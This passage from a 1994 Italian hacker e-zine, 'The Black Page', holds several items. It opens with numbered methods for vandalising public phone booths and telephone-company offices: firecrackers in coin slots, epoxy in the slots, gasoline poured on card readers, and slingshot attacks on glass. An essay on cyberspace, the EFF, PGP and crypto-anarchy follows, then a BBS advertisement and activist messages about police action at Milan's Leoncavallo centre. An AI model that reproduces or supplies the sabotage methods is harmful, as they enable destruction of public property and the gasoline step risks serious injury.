vengono fatti. La persona in questione potrebbe quin- di prendere di mira le cabine telefoniche. Proviamo ad immaginarci come ! Esempio 1) La persona infila un "raudo" o "minerva" acceso nello sportel- lino della restituzione monete della cabina. Il raudo esplode facendo saltare lo sportellino trasparente del vano di restituzione monete. Esempio 2) Il tipo inkazzato cola resina epossidica o silicone nelle fes- sure di inserimento delle monete. Di fatto questa azione blocca le cabine !!! Esempio 3) Il tale cosparge la cabina del telefono e il lettore di schede di BENZINA. La benzina ha un alto potere esplosivo, e noi abbiamo avuto noti- zie di gravi incidenti occorsi a vandali che abbiano agito in modo incauto. Nella maggior parte dei casi l'esplosione pare abbia fatto saltare il fronta- lino metallico dei lettori di schede. (Fonti Anonime, giornali locali) Esempio 4) Il tipo si organizza con fionda e pallini di acciaio, andando a centrare i vetri delle centrali Sip e delle sedi. Spesso esistono ampi por- toni in cristallo. Un vandalo ci ha confessato di aver frantumato uno di que- sto portoni in cristallo con un colpo di fionda. La maniglia del portone dap- prima e' rimasta a mezz'aria e poi e' caduta per terra. Anche le cabine della Sip pare siano state spesso prese di mira da vandali. Risulta cio' da uno stu- dio sociologico effettuato dalla Sip e pubblicato sulla loro rivista interna "Selezionando" di qualche mese fa, in cui risulta che le cause di questi atti di vandalismo sono spesso da ricercare nella decadenza dei valori della socie- ta' attuale che pare non offrire vie di sfogo ai giovani. Che peccato non aver trovato l'articolo !! In compenso avete letto quello relativo alle stime dei danni ... :) Dupree's Paradise ----------------------------------------------------------------- The Black Page - Numero 0, Settembre 1994 - Articolo 10 Quanto segue e' stato scritto nel gennaio 1994 (quindi *ben prima* dell'italian crackdown). Concepito per essere pubblicato su DECODER #9, e' rimasto poi inedito. Note: 1. il pubblico previsto per questo pezzo era quello classico di una rivista come DECODER, i cui lettori sono gia' svezzati per quanto riguarda i temi generali ma non padroneggiano necessariamente lo slang telematico. 2. alla luce delle proposte uscite anche in Italia in seguito al crackdown di maggio 1994, vorrei sottolineare a scanso di equivoci che gli apprezzamenti rivolti all'EFF e a quella che nelle conclusioni ho chiamato "Libera Repubblica del Ciberspazio" sono evidentemente ironici. ****************************************************************** 1. La democrazia elettronica e il suo business ============================================== Le comunit… in rete, le net-communities, costituiscono il risultato piu' interessante, dal punto di vista sociologico, della progressiva opera di cablaggio e interconnessione del globo. Per chi le vuole intendere cosi', costituiscono degli splendidi fenomeni da baraccone strettamente imparentati con la realta' virtuale e piu' in generale con l'intero universo cyberpunk: coppie che si conoscono e si sposano online, telenovelas sentimentali vissute in prima persona, amplessi condotti a distanza con l'ausilio di apposite periferiche, rapporti d'affari, liti, tutto questo e altro ancora diventa il circo-Spettacolo della societa' post-moderna, fagocitato dai media e dal loro pubblico. Comunita', identita', appartenenza. Luogo, patria, cittadino, straniero. Tutto si ripete e tutto muta una volta fatto il suo ingresso nella Matrice. Chaos. Disorientamento. Panico. Nuovi steccati con cui marcare i limiti della Frontiera, in modo che tutti possano vedere dove finisce il mondo e fino a dove e' ragionevole spingersi. Proliferano gli studi sulle comunita' virtuali e sulla fenomenologia delle relazioni sociali sulle reti telematiche, compaiono improvvisamente gli esperti che spiegano cosa sta accadendo e gli indigeni da intervistare - *ehi, com' e' la vita laggiu' ? Il ciberspazio e le comunita' che lo abitano esistono dal Principio dei Tempi, ma solo da poco e' iniziata la loro colonizzazione. I Pionieri hanno iniziato a muoversi per portare la loro civilta' ai Selvaggi. Diritti. Leggi. Ordine. Howard Rheingold annuncia che si e' definitivamente avviato il cammino verso la democrazia elettronica, ed in effetti la campagna presidenziale statunitense 1992 di Bill Clinton ha avuto un occhio di particolare riguardo verso gli utilizzatori delle reti telematiche - si dice sia stata un'idea del suo vice Al Gore, un passato lavorativo nel campo ed una conoscenza non superficiale delle dinamiche di rete. Clinton ha vinto ed uno dei punti fermi della sua amministrazione rimane la costruzione delle Information Superhighways, le autostrade della trasmissione dati. Un'infrastruttura comunicativa costituita da soluzioni tecniche di avanguardia, capace di collegare in tempo reale qualsiasi punto dell'immensa nazione americana. Il traffico dovrebbe essere costituito da ogni tipo di informazione digitale: messaggi o testi, musica, immagini, televisione e video, tutto idealmente a costi accessibili da parte di qualsiasi cittadino. Da parte sua l'Electronic Frontier Foundation, l'organizzazione nata in seguito all'operazione Sun Devil per tutelare i diritti dei cittadini nel ciberspazio, ha sempre posto al centro dei propri obiettivi la costituzione di un network globale (un National Public Network o una National Information Infrastructure) che dovrebbe fare da razzo vettore per la cultura e l'intrattenimento della societa' americana del terzo millennio. Fiore all'occhiello dell'EFF e' l'elaborazione di una serie di proposte operative per l'attuazione concreta di questo network, proposte che sono state sottoposte ormai piu' volte all'attenzione del Congresso degli Stati Uniti e a numerose sottocommissioni per le telecomunicazioni. La "moderazione" di queste indicazioni e la "rispettabilita'" dei membri fondatori hanno consentito all'EFF di superare quella diffidenza e quell'alone cospirativo con cui era stata guardata in un primo momento - l'EFF come la finanziaria degli hackers? "nossignori, qui si parla di diritti costituzionali nella Nuova Frontiera, si parla della storia degli Stati Uniti d'America e Thomas Jefferson sarebbe orgoglioso dei ragazzi dell'EFF". *Voila'*! Wired 1.3 July/August 1993 ruota intorno ad un lungo e articolato intervento del solito Mitchell Kapor ("fondatore della Lotus Dev. Corporation, sviluppatore di Lotus 1-2-3, co-fondatore dell'EFF..." just-in-case-you-don't-know-who-I-am). Where is the Digital Highway Really Heading? The Case for a Jeffersonian Information Policy. A partire da questo titolo il self-made man Kapor espone paure e speranze a proposito della futura infrastruttura comunicativa, richiamandosi agli ideali americani di sempre. Conclude cosi' : The Jeffersonian ideal - a system that promotes grass-roots democracy, diversity of users and manufactrers, true communications among the people, and all the dazzling goodies of home shopping, movies on demand, teleconferencing, and cheap, instant databases - is composed og high bandwidth, an open architecture, and distributed two-way switching. It's our choice to make. Let's not blow it. Kapor e' uno che sa quello che dice, e si vede. Ma cosa succedera' ora che anche il Presidente degli Stati Uniti se ne e' accorto, *ed e' d'accordo con lui*? EFFector Online (organo elettronico di informazione quindicinale della fondazione), Volume 6 No.8, 28 dicembre 1993: Subject: Gore Endorses EFF's Open Platform Approach. Washington -- Vice President Al Gore announced at the National Press Club today a long-term White House telecommunications policy initiative that incorporates the major elements of the Electronic Frontier Foundation's Open Platform policy recommendations. The Vice President's speech, which credited EFF co-founder Mitchell Kapor for articulating the need for an "open platform" information infrastructure, outlined five policy principles for the National Information Infrastructure (NII). Kapor said that he is "honoured" by the reference in Gore's speech. "I'm awfully happy that the Open Platform is right in the middle of the Administration's infrastructure strategy, and that they see Open Platform and open access as just as important as competition. "President Clinton and Vice President Gore deserve great credit for being the first Administration in over a decade to offer a comprehensive approach to telecommunications policy," Kapor said. "I am looking forward to working with the White House and the Congress to help see this thing through." Guardie e ladri brindano insieme, Sun Devil e' gia' lontano. Alla Frontiera sta arrivando la Civilta'. 2. Comunita virtuali e comunita' reali ====================================== La comunita' virtuale di cui parla Howard Rheingold nel suo ultimo libro e nell'articolo delle pagine precedenti e' quella di The WELL. Ex-fricchettoni californiani ora trasferitisi nel computer business, un po' liberal, ma tutto sommato "gente per bene". Un ottimo esempio di comunita', a dire il vero: un insieme di tratti culturali comuni, le norme di comportamento online rimangono per lo piu' non scritte senza creare particolari problemi, e quand'anche qualcuno assuma atteggiamenti devianti e' sufficiente la riprovazione generale per riacquistare l'omeostasi. The WELL e' anche un buon esempio di come lo sviluppo di una personalita' in rete (una personalita' solo apparentemente "virtuale") vada ad integrarsi con il resto delle esperienze che un individuo conduce nella vita di tutti i giorni. La capacita' di gestire molteplici ruoli e' un requisito essenziale del "soggetto moderno": dai tempi della rivoluzione industriale l'appartenenza ad una corporazione non esaurisce piu' le coordinate che identificano un individuo nella societa'. Oggi i ruoli di padre, marito, amante, lavoratore, giocatore di golf, ateo esistenzialista o cyberpunk viaggiano su binari diversi. La vita in rete e' nient'altro che un binario in piu', una sfera di significati in cui si entra e si esce con l'aiuto di una tastiera o di un datasuite. Certo i diversi mondi conservano dei legami tra loro ed e' compito del soggetto trovare la funzione che gli permetta di sentirsi a casa propria in ognuno di essi, nel proprio ruolo di leader in una conferenza elettronica hack/phreack come con i colleghi del lavoro quotidiano allo sportello bancario. Tuttavia la vita del cybernauta e' potenzialmente schizofrenogenica: in rete egli trova finalmente le condizioni migliori per lo *split*. Lo stacco definitivo di una personalita' dalle altre, l'orgasmo della modernita'. Ma quando anche questo split avvenga, cio' non significa che la persona in rete sia necessariamente anonima. Il c-spazio mette a disposizione gli strumenti per costruire un Se' online attraverso dinamiche molto simili a quelle tradizionali: dall'interazione con l'ambiente emergono infatti i contorni di una struttura sociale "virtuale" fatta anch'essa di norme, sanzioni, processi di socializzazione, istituzioni, ruoli. La navigazione del soggetto in quest'universo da' luogo alla definizione della persona in rete: ogni azione, ogni bit comunicativo costituisce un mattone nella costruzione di un'identita' che viene riconosciuta, da chi la vive e dagli altri, come identita' concreta che si affianca alle altre gia' esistenti. Chi si comporta come uno stronzo e' uno stronzo. Chi entra in rete per la prima volta non e' nessuno. *Tabula rasa*. Rete come paradigma di uno dei tanti mondi della societa' "complessa", a chi ci vive rimane il compito di come integrare (o non integrare) la sua persona in rete con la sua persona negli altri mondi: quanto a questo, i sistemi telematici XXX-rated dal contenuto erotico sono spesso terreni di gioco per chi - magari persona "normale" e rispettabile nella vita di tutti i giorni - sente il bisogno di rendere completamente indipendente una delle sue personalita' dalle altre, sottraendola al dominio della gabbia familiare/lavorativa/ricreativa in cui si e' andato a rinchiudere. Un rimedio tardivo e parziale forse, ma anche una finestra di liberta' per chi (si) e' condannato a vivere nel recinto dell'ortodossia. In altri casi invece la rete e' solo una dimensione in piu' nella quale ribadire la propria autonomia. Ribelli online e offline. Se The WELL e' la comunita' virtuale di Howard Rheingold e del sogno americano, ordinata e competitiva, in altri luoghi si sviluppano le espressioni online del radicalismo politico piu' spinto. SPUNK Press - ad esempio - e' un progetto editoriale che vede nelle risorse telematiche un'arma da guerra di cui fare buon uso: opere storiche del pensiero libertario e anarchico, saggi, fanzines, vengono digitalizzati e fatti circolare in rete in infinite copie; il progetto percorre il c-spazio in direzione trasversale attraverso continue ramificazioni, da Internet alle reti amatoriali di BBS su linea commutata. Dagli interstizi virtuali piu' reconditi il flusso comunicativo torna di nuovo a replicarsi su supporto fisico attraverso opportuni gateways con il mondo esterno (ovunque ci siano un pc e una stampante), a dimostrazione della continuita' tra esperienze "dentro" e "fuori" la rete. I membri del collettivo di coordinamento di SPUNK Press - attualmente in Olanda, Svezia, Scozia, Italia e Stati Uniti - interagiscono e negoziano la loro cooperazione online mantenendo un filo invisibile tra comunita' "reali" e "virtuali" e conservando anche nel ciberspazio gli stessi meccanismi decisionali collaudati nei tradizionali luoghi di confine come centri sociali autogestiti, squats e comuni di vario tipo. La comunita' virtuale di SPUNK proviene da un processo di morphing che coinvolge esperienze di vita reale di tutto il mondo, le trasfigura in rete ed e' pronto a vomitarle nuovamente fuori sotto forme mutanti imprevedibili. 3. Il nemico pubblico numero uno: la crittografia a chiave pubblica ======================================================================== L'evento dell'anno 1993 nel cyberspace si chiama PGP. Pretty Good Privacy, un nome perfetto per un pacchetto di crittografia a chiave pubblica di pubblico dominio in rete. La National Security Agency e l'FBI hanno tentato di bloccarne la diffusione accusando l'autore - Phil Zimmerman - e chi ne ha favorito la distribuzione all'estero attraverso Internet di "esportazione in paesi stranieri di tecnologie e informazioni che possono nuocere alla sicurezza degli Stati Uniti d'America". Si sono sollevati in difesa di Zimmerman i potenti avvocati dell'EFF e c'e' da scommettere che tutto si risolvera' in un gran polverone. Anche perche', in ogni caso, NSA e FBI sono semplicemente arrivati troppo tardi. Nel luglio 1993, tre giorni dopo il rilascio ufficiale della versione 2.3a, PGP era in Italia completo di codice sorgente importato attraverso il cyberspace da alcuni dei piu' attenti e cattivi technopunx nostrani. Lo stesso e' accaduto per gli altri paesi. Come mai tanto casino a causa di un programma che e' una semplice implementazione di algoritimi matematici studiati da anni? La crittografia a chiave pubblica nasce per ovviare a uno dei principali inconvenienti della crittografia tradizionale: la disponibilita' di un canale di comunicazione sicuro attraverso il quale scambiarsi la chiave di codifica/decodifica. Se A vuole mandare un messaggio segreto a B, tale che possa essere letto solo da quest'ultimo, A e B devono trovare il modo per concordare e scambiarsi una chiave; possono vedersi di persona o usare altri mezzi (telefono, radio, altro) ma in ogni caso esiste la possibilita' che la chiave venga intercettata nel momento in cui passa da uno all'altro degli interlocutori. La crittografia a chiave pubblica non fa uso di un'unica chiave comune a tutti i partecipanti, bens di una coppia di chiavi personali specifiche per ciascun individuo. Ognuno genera in privato la propria coppia: una e' la chiave privata che andra' tenuta segreta (ed alla quale e' associata per maggior sicurezza una parola d'ordine), l'altra e' la chiave pubblica vera e propria che andra' diffusa in rete. Ogni chiave e' costituita da stringhe di poche centinaia di bytes, facilmente trasportabili nel cyberspace. Le due chiavi sono legate da una relazione algebrica, ma conoscendo la chiave pubblica non e' in alcun modo possibile risalire a quella privata in tempi computazionali ragionevoli (diverse decine di anni di calcolo con la migliore tecnologia attuale). Le due chiavi si dividono i compiti: quella pubblica codifica i dati, senza poterli decodificare; se A vuole comunicare con B, usera' la chiave pubblica di B per crittografare il messaggio, sicuro che solo B e' in possesso della corrispondente chiave privata (e della parola d'ordine) che consente di risalire al testo in chiaro. Naturalmente A deve essere in possesso della chiave pubblica di B e per questo motivo e' interesse di B che la propria chiave pubblica venga distribuita il piu' possibile su tutti i canali del c-spazio, tanto piu' che essa ora puo' essere vista anche da terze parti "male intenzionate", che non essendo in possesso della chiave segreta non avrebbero comunque piu' la possibilita' di decodificare il messaggio. Detto per inciso, questo ha fatto nascere una delle tante mode online: la configurazione personalizzata del proprio editor allo scopo di aggiungere la propria chiave pubblica alla fine di ogni messaggio immesso in rete; inoltre, sempre l'esigenza di diffondere il piu' possibile le chiavi pubbliche ha condotto alla creazione di archivi/database in cui si puo' eventualmente cercare la chiave di una persona specifica con cui si vuole comunicare in perfetta privacy - un primo tentativo in Italia in questo senso e' stato intrapreso su BITs Against The Empire BBS (la tana di chi scrive), che in un'area file apposita conserva tra le altre le chiavi dei piu' assidui frequentatori di Cybernet. Una seconda caratteristica della crittografia a chiave pubblica e' la possibilita' di firmare un messaggio con la propria chiave privata, lasciandolo in chiaro (senza necessariamente crittografarlo). Si tratta del processo inverso: B scrive un messaggio, lo sottopone ad un algoritmo in cui vengono usati come argomenti la chiave privata (e la parola d'ordine) ed il messaggio stesso; il risultato e' una firma elettronica costituita da una stringa di caratteri che viene aggiunta in fondo al testo. A riceve il messaggio firmato, lo sottopone a verifica utilizzando la chiave pubblica di B ed ottiene la conferma che solo B puo' averlo scritto. I fondamenti della crittografia a chiave pubblica, cioe' cio' che spiega come tutto questo sia possibile, vengono trattati in testi specifici reperibili nelle librerie scientifiche. Il software PGP e' disponibile su molti nodi di Cybernet, in versioni eseguibili in ambiente MS-DOS, Amiga e UNIX, e sotto forma di codice sorgente compilabile su qualsiasi altra piattaforma hardware. 4. Cypherpunk, Cryptoanarchy e altre storie ======================================== Lo sviluppo attuale delle reti e della tecnologia permette di pensare al ciberspazio come ad un luogo piu' ospitale di qualsiasi spazio fisico per esperimenti di nuovi modelli di comunita' libertarie. Le comuni tradizionali, quand'anche riescano a trovare un proprio equilibrio, rimangono soggette ad attacchi di ogni tipo da parte di strutture di potere organizzate e violente. Basti pensare all'apocalisse di Waco in Texas, ai tentativi di creare collettivita' non-statali in sperdute isolette del Pacifico o agli sgomberi di molti Centri Sociali Autogestiti in Italia. La Matrice, Internet, e' invece intrinsecamente decentrata ed inattaccabile. E' nata durante la guerra fredda per resistere ad un attacco nucleare sovietico, la distruzione completa di uno qualsiasi dei suoi nodi non ha nessun effetto sulla vita globale della rete. E' transnazionale: le legislazioni delle singole nazioni valgono, al massimo, sui nodi che cadono sotto la giurisdizione statale. E' caotica: due nodi possono essere collegati tra loro attraverso strade diverse. All'occurrenza i nascenti sistemi di remailing e i programmi hackerati di fake-mail la rendono anche anonima: chi riceve il mio messaggio non puo' sapere che sono stato io a mandarlo, se io non voglio. In un simile scenario la crittografia a chiave pubblica costituisce il sistema di innesco di questo ordigno - la molotov digitale piu' potente che sia mai stata costruita, al servizio dell'individuo e delle sue liberta'. Un programma come PGP permette un grado di confidenza perfetto tra persone che non si sono mai incontrate fisicamente; piu' precisamente, permette confidenza e privacy tra pseudonimi e non tra le rispettive identita' globali. Posso mandare un messaggio (o un file binario, con dati di qualsiasi tipo) a B, sicuro che soltanto B potra' leggerlo. Cosa altrettanto importante, posso essere assolutamente sicuro che il messaggio (firmato) che ho ricevuto da B puo' essere stato scritto esclusivamente da lui, tanto che nemmeno lo stesso B potrebbe piu' negarlo. Ma tutte queste relazioni coinvolgono solo gli pseudonimi a cui sono associate le chiavi pubbliche e non le altre facce della personalita' del soggetto "moderno", e tantomeno la sua identita' legale anagrafica. Stanno nascendo banche e sistemi di acquisto e pagamento basate sul *digicash*, sul denaro digitale gestito da persone- pseudonimi e dalle loro chiavi pubbliche (un esempio e' l'istituto di credito fondato ad Amsterdam da David Chaum, che da anni si occupa di crittografia al locale Center of Mathematics and Computer Science). Insomma, nello spazio virtuale criptoanarchico posso scegliere a quale livello condurre le mie relazioni sociali e le mie transazioni economiche, posso scegliere quale delle mie molteplici identita' rivelare, e a chi. E posso avere piena fiducia nel flusso di dati proveniente e firmato da uno pseudonimo di cui non conosco nulla, se non il suo precedente comportamento nel c-spazio. E' la vittoria definitiva dell'attore sociale che costruisce (o distrugge) invece di subire, la vittoria del mondo delle possibilita' opposto a quello delle qualita' ascritte e del pregiudizio. Allo stesso modo puo' essere anche il regno della cospirazione, della massoneria digitale, dei flussi di denaro incontrollati da un conto bancario all'altro. *Fuck Off*! I pruriti dei benpensanti servono a ben poco, esattamente quanto i casi sollevati da NSA e FBI o le interrogazioni sul possibile uso di questa privacy da parte di terroristi e narcotrafficanti internazionali. La cryptoanarchia e' arrivata assieme ai microprocessori degli anni '90, risiede in pochi bytes di dati duplicabili all'infinito e ovunque, che ci piaccia o no, inarrestabili. 5. Conclusioni ============== Tiriamo le fila di tutto questo discorso. Chi non si cabla oggi, da solo, verra' cablato a forza tra qualche tempo o morira' di fame e di stenti. Il mondo terreno si e' accorto del ciberspazio, gli piace e sta clonando se' stesso in rete, con le sue strutture di controllo e i suoi meccanismi di regolazione. Dal gennaio 1994 sono entrati in vigore in Italia nuovi articoli di legge specifici sui reati informatici, sull'hacking e la pirateria software; adesso circolano proposte per regolamentare il mondo delle BBS amatoriali, per le quali si prevede l'obbligo di una concessione apposita. Iniziamo a diventare obiettivi di campagne elettorali e di posta-spazzatura elettronica. *Gia' visto*. E' un classico della dialettica tra individuo e sistema sociale: accanto al vigore normativo e alla dimensione burocratica/razionale, si esprimono gli aspetti piu' conviviali: cyber-cops, cyber-junkies, cyber-amici e cyber-figli-di-puttana, le virtual communities e tutto il resto, l'ufficio anagrafico e il bar di quartiere, comunita' e societa' convivono gomito a gomito. Allo stesso modo che nel mondo fisico alcune zone piu' di altre sfuggono alla pervasivita' delle istituzioni strutturate: la cultura organizzativa di Fidonet, il piu' esteso network amatoriale (con 20.000 nodi distribuiti capillarmente su tutto il globo) prevede che ogni sua conferenza elettronica abbia un regolamento formale scritto e un moderatore che ne controlli l'applicazione - al contrario, l'esperienza condotta finora su Cybernet si e'basata invece proprio sull'assenza esplicita di responsabili e di norme codificate. E' la vecchia danza tra l'individuo e il suo ambiente, in cui oscilla l'altalena tra oggettive questioni di vivibilita', ambizioni personali, potere e necessita' di chiarezza. Naturalmente ci sono pro e contro ed e' possibile che anche Cybernet decida di dotarsi in futuro di una policy scritta. La colonizzazione del ciberspazio, l'Electronic Frontier Foundation, la democrazia elettronica, i gruppi di pressione che si stanno formando anche in Italia a favore dei diritti civili in rete, le comunita' virtuali come The WELL e come SPUNK Press, le prospettive della crittografia e della cryptoanarchia. Le forme di vita uscite dal primordiale brodo di coltura di questi primi anni di cataclismi della telecomunicazione globale. Tutto questo impone delle scelte anche a chi finora e' sfuggito alla propria mutazione in una direzione precisa. Si puo' decidere di unirsi agli sforzi di chi lotta per una Societa' Giusta, perfino per una *Grande Societa'*. Perfino per la Libera Repubblica del Ciberspazio, in cui tutti i cittadini sono "uguali" di fronte alla Legge. Oppure si puo' dissolvere il proprio pseudonimo e teletrasportarlo altrove, ovunque si incontri una TAZ accogliente, un luogo ancora libero protetto da una barricata digitale in grado di nasconderlo per qualche tempo alla vista e alle coscienze del mondo esterno. Lo Spettacolo e' appena cominciato. Luc Pac BIBLIOGRAFIA ESSENZIALE: ======================== (tutti i documenti elettronici sono disponibili su vari nodi della rete Cybernet) Sui rapporti tra istituzioni pubbliche e ciberspazio: ----------------------------------------------------- EFFector Online, bollettino elettronico, tutti i volumi dal 1992 al 1994. The White House E-Mail Frequently Asked Questions, documento elettronico, 1993. Sugli aspetti sociali dell'interazione in rete: ----------------------------------------------- Howard Rheingold, The Virtual Community, Addison-Wesley, 1993 Luc Pac, Sociologia del Ciberspazio: la costruzione sociale della realta' sulle reti telematiche, in preparazione, 1994 Sulla crittografia a chiave pubblica: ------------------------------------- PGP Pretty Good Privacy User's Manual (allegato al pacchetto PGP) David Chaum, Achieving Electronic Privacy, Scientific American, agosto 1992 Su Cryptoanarchy e Cypherpunks: ------------------------------- Chuck Hammil, From Crossbows to Cryptography: Thwarting the State Via Technology, documento elettronico, 1987 Eric Hughes, A Cypherpunk's Manifesto, documento elettronico, 1993 Timothy C. May, The Crypto Anarchist Manifesto, documento elettronico, 1988 ===================================================================== PUBBLICITA' REGRESSO -------------------- ATD CARRIER 28.800 CONNECT 28.800/VFC o Locking Com 1 at 38400. o Connected to Node 4 at 9600 ,8,N,1. o Connected at 28.800/VFC ---------------------------------------------------------------------- ProMatrix DOS Shell Version .21a (c)Copyright The H.C.T. Corporation 01/31/94 (c)Copyright Hi.T.Moonweed 1992-93 Licensed To [ One Man Crew ] C:\1MC>1mc 1) Here are the current Lines setup and some notes on each nodes: NODE #1 - ZOOM VFAST 28.8K - Running under Intermail - +972-4-773663 NODE #2 - USR SPORSTER 14.4K - Running under ProMatrix - +972-4-772638 NODE #3 - USR SPORSTER 14.4K - Running under ProMatrix - +972-4-772860 NODE #4 - INTEL v32b 14.4K - Running under ProMatrix - +972-4-773425 NODE #5 - RACKAL-MILGO 14.4K - Running under ProMatrix - +972-4-773896 NODE #6 - ZOOM VFAST 28.8K - Running under ProMatrix - +972-4-771706 2) Now that the ZOOM modems are working fine, and this bbs will be getting new and new modems and will switch to all 28.8K at the end, it will be wise to get one yourself. Leave me message if you want amazing fast 28.8K modem, and hell it working great in israel. For Registers by time: 28.8K will let you download as twice as at 14.4K by the price of regular registration. 3) Special CD-ROM offer: Real soon you might be able to get your favorite CD-ROMs at the prices of 120Nis (Cost in a store upto 250 - 350 Nis for average DISC). Also, you can get your own files wormed up, by only $60. For More info leave me a message. 4) Comment us for any problems or complains, we are always around to hear you. We can be reached via private mail on this BBS, or by leaving a MSG in the Mail-Box. All The Best Bonijoni ----------------------------------------------------------------- The Black Page - Numero 0, Settembre 1994 - Articolo 11 LeOnCaVaLlO ----------- Solidarieta' ad un Gruppo che lotta per la LIBERTA' =================================================== I messaggi che seguono provengono da Decoder BBS, postati dalla rete ECN. Leggerli mi ha fatto molto incazzare perche' mi sono reso conto che di tutti questi casini a Milano la stampa non ha fatto sapere assolutamente NIENTE. Inoltre, a quanto pare, le forze dell'ordine si muovono in modo molto ... come dire ... contestabile. Speriamo, con questa ns rivista, di poter fare qualcosa anche noi per far co- noscere alla comunita' Hacker/Cyberpunk la realta' delle cose. -------------------------MESSAGGI------------------------------------------ Area: News dai Centri Sociali Msg#: 5264 Date: 16 Jul 94 20:38 From: ECN Milano Read: Yes Replied: No To: tutti Mark: Subj: parco lambro '94 SI CERCANO I MORTI PER TRE BARACCHE DI LAMIERA Alle 18,00 di oggi 16 luglio il comandante dei vigili urbani in compagnia del capo della Digos e del Vicequestore si e' presentato all'iniziativa di festa e di lotta in corso da ieri in via Salomone di fronte al centro sociale Leoncavallo, esigendo lo smontaggio di tre box di lamiera costruiti sul marciapiede della medesima via. Al rifiuto unanime opposto verbalmente e pacificamente dai presenti si e' mosso lo spropositato apparato che da giorni incombe sulle migliaia di giovani e meno che quotidianamente hanno cominciato a frequentare l'iniziativa "Nessuna giustizia nessuna pace". Solo l'immediata reazione dei presenti e probabilmente la valutazione delle gravissime conseguenze che avrebbe avuto un attacco di polizia contro centinaia di persone esasperate dagli infiniti divieti che opposti dal loro sindaco in questi mesi, e in questi ultimi tempi in modo ossessivo ha evitato che la situazione degenerasse. Il termine provvisorio di questa situazione e' giunto, con la dichiarazione dei responsabili dell'ordine pubblico, di voler aspettare la giornata di domani per eseguire la volonta' di Formentini. E' incredibile che nella Milano del '94 strutture passibili di sole sanzioni amministrative mobilitino migliaia di uomini, decretino la militarizzazione dei quartieri, producano situazioni di gravissimo pericolo per l'incolumita' di centinaia di persone. Ma una citta' in cui in un anno sono arrivate quasi 800 denunce a carico di centinaia di giovani, lavoratori fuori e dentro la fabbrica, disoccupati appartenenti a quel composito movimento di associazioni, centri sociali, case occupate; una citta' che ha vietato in sei mesi le manifestazioni di piazza a questo stesso aggregato; in cui si straparla incredibilmente e ancora di sgomberi di centri sociali, mentre si discutera' luned in consiglio comunale, su proposta del PPI e di alcuni rappresentanti della lega, l'assegnazione di 9 miliardi, gia' stanziati per le politiche giovanili, alle associazioni e alle cooperative legate alla Compagnia delle opere, per quel che riguarda la gestione in comodato e quindi in forma privatistica dei centri sociali territoriali. Questo con il preciso intento di cancellare dai territori metropolitani qualunque spazio di autogestione e autogoverno che si ponga in modo conflittuale rispetto alle politiche economiche, sociali e culturali della giunta Formentini. Tale progetto passa anche attraverso la ridefinizione delle stesse strutture territoriali del decentramento, dai servizi alle persone a quelli culturali e ricreativi, destinati a diventare una versione "aggiornata" dell'oratorio, luoghi in cui raccogliere consensi e omologare le fasce giovanili. Quindi, oltre la semplice privatizzazione dell'accesso ai servizi con il pagamento del biglietto di ingresso, si escludono gli attuali operatori che da anni lavorano all'interno dei servizi sopperendo con la loro professionalita' alla carenza di risorse frutto della pluriennale politica di smantellamento dei servizi sociali. Intendiamo continuare l'iniziativa in corso mantenendo tutti gli appuntamenti di dibattito e di lotta gia' annunciati e che prevedono per i prossimi giorni: - luned 18 luglio ore 6.00 presidio in difesa della casa occupata di via dei transiti 18 sotto sgombero ore 17.00 saremo presenti in Consiglio comunale - marted 19 luglio ore 11.00 presidio davanti al tribunale in concomitanza con la seconda udienza del processo a carico di 17 compagni per iniziative ANTIFASCISTE. Milano, 16 luglio 1994 Le realta' che partecipano al meeting Msg#: 5290 Date: 18 Jul 94 15:55 From: ECN Milano Read: Yes Replied: No To: tutti Mark: Subj: Appello a tutti i compagni !!! "NESSUNA GIUSTIZIA NESSUNA PACE" L'iniziativa di festa e di lotta "nessuna giustizia nessuna pace" promossa da varie realta' antagoniste milanesi, e' stata oggetto dell'ennesimo e pesantissimo attacco da parte delle truppe inviate dal Sindaco Formentini, che, di fronte al legittimo esercizio del diritto a costruire momenti di incontro, di festa, di dibattito e confronto pubblici, ha dato una soluzione militare a quello che si configurava come un semplice reato amministrativo. E' il prosieguo della pratica di negazione degli spazi ormai costante in questa citta'; l'ennesima ostentazione della volonta' di annientare qualsiasi realta' che rifiuta logiche di omologazione. ALLE 7.30 DI OGGI, UN NUMERO SPROPOSITATO DI CARABINIERI E AGENTI DI POLIZIA, CHE DA GIORNI STAZIONANO IN PROSSIMITA' DEL C.S. LEONCAVALLO, CON L'AUSILIO DELLA PROTEZIONE CIVILE E DELLA POLIZIA MUNICIPALE, HA ISOLATO E MILITARIZZATO GRAN PARTE DELLA ZONA DI VIA SALOMONE, OPERANDO LO SMONTAGGIO ED IL SEQUESTRO DELLE STRUTTURE LEGGERE SISTEMATE NELLA "STRISCIA DI GAZA", L'AREA LARGA POCHI METRI POSTA DI FRONTE AL CENTRO SOCIALE DI VIA SALOMONE, IN CUI SI E' SVILUPPATA IN QUESTI GIORNI LA FESTA. OLTRE ALLA PROVOCAZIONE E ALL'ATTACCO POLITICO, INGENTISSIMO E' IL DANNO ECONOMICO. Tutto questo mentre si stava svolgendo un presidio di fronte alla casa occupata di via dei transiti 28, per impedire lo sgombero di alcuni appartamenti previsto per oggi, Questo sgombero e' stato rimandato a mercoledi' 20 luglio, giorno in cui scade l'assegnazione dei locali della ex-Krupp di via salomone 71 al C.S. Leoncavallo, ed in cui inoltre le 8 famiglie di via Rilke che da piu' di 45 giorni occupano il consiglio di zona 13 ne dovranno lasciare i locali. L'ASSEMBLEA DELLE LE REALTA' ORGANIZZATRICI DELL'INIZIATIVA, SVOLTASI NELLE PRIME ORE DEL POMERIGGIO, HA RIBADITO LA FERMA VOLONTA' DI MANTENERE IL PROGRAMMA ORIGINARIO, RICONFERMANDO TUTTI GLI APPUNTAMENTI IN PROGRAMMA, IN QUESTO LUGLIO MILANESE IN CUI, CON L'USO DELLA VIOLENZA LEGALIZZATA, SI VOGLIONO CANCELLARE ESPERIENZE UNICHE DI DEMOCRAZIA DIRETTA E DI AUTOGESTIONE DEL TERRITORIO. FACCIAMO APPELLO A TUTTI I COMPAGNI AFFINCHE' SIANO PRESENTI CON LA MASSIMA MOBILITAZIONE E LA MASSIMA DETERMINAZIONE ALLE PROSSIME SCADENZE DI LOTTA: MERCOLEDI' 20 LUGLIO MOBILITAZIONE GENERALE CONTRO GLI SGOMBERI SABATO 23 LUGLIO MANIFESTAZIONE NAZIONALE LE REALTA' ORGANIZZATRICI DEL MEETING "NESSUNA GIUSTIZIA NESSUNA PACE" MILANO, 18 LUGLIO 1994 Per informazioni Centro Sociale Leoncavallo - tel. 02 58014348 - fax 02 26820360 Radio Onda d'Urto - tel. 02 2827494 / 